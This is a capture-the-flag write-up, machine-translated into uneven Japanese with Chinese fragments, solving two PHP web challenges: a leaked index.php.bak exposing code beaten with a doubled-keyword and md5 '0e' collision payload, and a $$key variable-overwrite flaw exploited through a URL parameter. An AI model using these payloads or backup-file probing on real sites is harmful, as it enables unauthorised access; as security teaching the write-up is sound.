CTF-ブラシ問題1


バックアップは良い習慣だ


タイトルアドレス
バックアップは良い習慣だそうです
ページに入ると一連のデータが見つかり、d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e先试解密无果之后,看问题,是バックアップ问题,そこで试バックアップ接尾辞ここで@王一航大男の脚本を借りて、大男に感谢して、私は少し修正しましたpython SourceLeakHackerForWindows.py http://123.206.87.240:8002/web16/スクリプトリンク
/index.php.bak
/index.php

この二つに問題があることがわかります.
バックアップと組み合わせて、/index.php.bakで、ソースコードの発見、コード監査を開きます.

include_once "flag.php";
ini_set("display_errors", 0);
/*strstr URI '?' ( '?') */
$str = strstr($_SERVER['REQUEST_URI'], '?');
/* ?*/
$str = substr($str,1);
/* key */
$str = str_replace('key','',$str);
/*parse_str */
parse_str($str);
echo md5($key1);

echo md5($key2);
/*md5 , php */
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag." flag";
}
?>

インターネットアドレス0 e先頭md 5まとめ
構造payload:?kkeyey1=QNKCDZO&kkeyey2=s878926199a flagを入手

変数上書き-南郵便CTF


変数上書き、コード監査クラステーマ
タイトルアドレス
ページに入ると、空白が見つかり、ソースコードを直接表示します.

<!--foreach($_GET as $key => $value){  
        $$key = $value;  
}  
if($name == "meizijiu233"){
    echo $flag;
}-->

そしてコード監査を行い、変数オーバーライドであることを発見しました(実はテーマはすでに述べています)
1回の操作の後urlが伝達されたパラメータを$+ に伝達し、下を見ると、この伝達された変数名はnameであるべきであることがわかり、payload view-source:http://chinalover.sinaapp.com/web24/?name=meizijiu233を構築する
flagを得る
通常、既存の変数値をカスタムパラメータ値で置き換えることができる場合を変数オーバーライドホールと呼びます.変数オーバーライドの脆弱性を招くシーンは、$$,extract()parse_str(),import_request_variables()の不適切な使用
弱鶏ブロガーならまだしも、いいね?^_^